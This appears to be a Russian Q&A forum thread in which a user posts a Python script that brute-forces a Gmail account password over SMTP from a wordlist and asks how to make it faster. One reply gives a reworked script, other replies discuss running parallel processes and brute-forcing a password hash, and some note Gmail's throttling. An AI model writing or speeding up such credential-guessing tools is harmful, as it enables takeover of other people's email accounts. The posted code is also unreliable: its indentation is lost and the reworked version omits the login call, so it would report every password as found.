Как ускорить процес пайтон

Даня арарра Ученик (98), открыт 2 недели назад
у меня есть простенькая прога для брута почты(я не собираюсь ничего взламывать и все такое)
 import smtplib

smtp_server = smtplib.SMTP("smtp.gmail.com", 587)
smtp_server.starttls()
password_list = open('{словарь}','r')
for password in password_list:
try:

smtp_server.login("email@gmail.com", password)
except:
print('lox')
print('krasava')
print('password')

вопрос в том чтобы ускорить процесс брута
4 ответа
Вертолётов 625 Мудрец (13323) 2 недели назад
Код:
 import smtplib

smtp_server.starttls()

# Используем with для автоматического закрытия файла
with open('{словарь}', 'r') as password_list:
for line_number, password in enumerate(password_list):
# Удаляем символ новой строки в конце пароля
password = password.strip()
try:
print(f"Пароль найден: {password}")
break # Прерываем цикл, если логин успешный
except smtplib.SMTPAuthenticationError:
print(f'Попытка #{line_number + 1} неудачна для пароля: {password}')
except Exception as e:
print(f"Произошла ошибка: {e}")
break

smtp_server.quit()
Оракул Оракул (62098) 2 недели назад
Лох пишется Lokh, а у вас Локс
Андрей Высший разум (462228) 2 недели назад
Никак. Ты не можешь перебирать пароли быстрее, чем gmail возвращает ответы о результатах авторизации. А эти самые ответы возвращаются совсем не мгновенно - именно для того, чтобы брутфорсерам жизнь мёдом не казалась.

Можешь, конечно, запустить сразу множество процессов, каждый из которых перебирает свою часть паролей... В надежде на то, что программисты gmail совсем тупые и не предусмотрели защиту от подобных атак.
Даня арарраУченик (98) 2 недели назад
а никак нельзя взять хэш пароля от почты, а его уже брутить?
Вертолётов 625 Мудрец (13323) еарап арарра, В почте уже наверняка все варианты предусмотрели.
Алекс Куха Высший разум (461801) 2 недели назад
Задержки сети не сопоставимы с быстродействием софта, даже пайтоновского. Разница в порядках
Да и атака с одного ip распознаётся на раз